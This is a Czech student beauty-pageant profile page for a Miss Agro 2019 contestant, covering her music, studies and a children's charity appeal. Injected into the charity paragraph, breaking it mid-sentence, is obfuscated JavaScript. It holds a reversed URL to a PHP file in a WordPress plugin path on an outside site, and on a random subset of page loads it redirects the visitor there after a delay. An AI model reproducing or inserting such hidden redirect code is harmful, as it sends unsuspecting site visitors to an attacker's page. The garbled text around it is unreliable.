Marie Růžičková

Profil

Fakulta: FŽP
Obor: Aplikovaná ekologie (BEKOL)
Ročník: 2.
Věk:
21

Zpěvačka, saxofonistka a dudačka. Vyrůstala vedle svých dvou bratrů v jednom společném pokoji u folklor milujících rodičů. Silné sourozenecké pouto jim zůstalo až do dospělosti, kde se u všech projevila hudební vášeň. Prošla mnoha soubory a dnes společně s bratry hraje v jejich folk rockové kapele JAMARON („džamaron“). Získala 1. místo na mistrovství ČR ve hře na české dudy a podívala se do různých koutů světa. Miluje cestováni s batohem na zádech, přírodu, dobré jídlo a pivo. Je nespoutaná a sama sebou.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2019?

Mám co nabídnout a mých 180 cm v tom rozhodně nehraje žádnou roli. Jsem optimistická, kreativní, umělecky založená. Ke každé věci přistupuji s nadhledem a s pořádnou dávkou humoru.

Máš nějaký životní vzor? Čím Tě inspiruje?

Nemám životní vzor, a to proto, že chci svůj život žít bez podkladů a jít vlastní cestou. Inspirují mě hlavně lidé, kteří konají dobro, i když zrovna nejsou vidět.

Na který předmět na ČZU vzpomínáš nejvíce a proč?

Nejzáživnější byly zatím rozhodně Agroekosystémy. Ale spíš, než předmět, to byl dost intenzivní kurz přežití. Kurz plný pojídáni jedovatých plodin a přípravy na třetí světovou.

Na co se v soutěži Miss Agro těšíš nejvíc?

Nikdy jsem si nemyslela, že se do takovéto soutěže přihlásím. Ta, která raději hospodu než zrcadlo. Ale v průběhu soutěže mi došlo, že to není úplně o tom. Noví přátelé, kteří budou nejspíš uhození stejným předmětem do hlavy jako já a k tomu kopec zkušeností. Celé je to jedna velká jízda.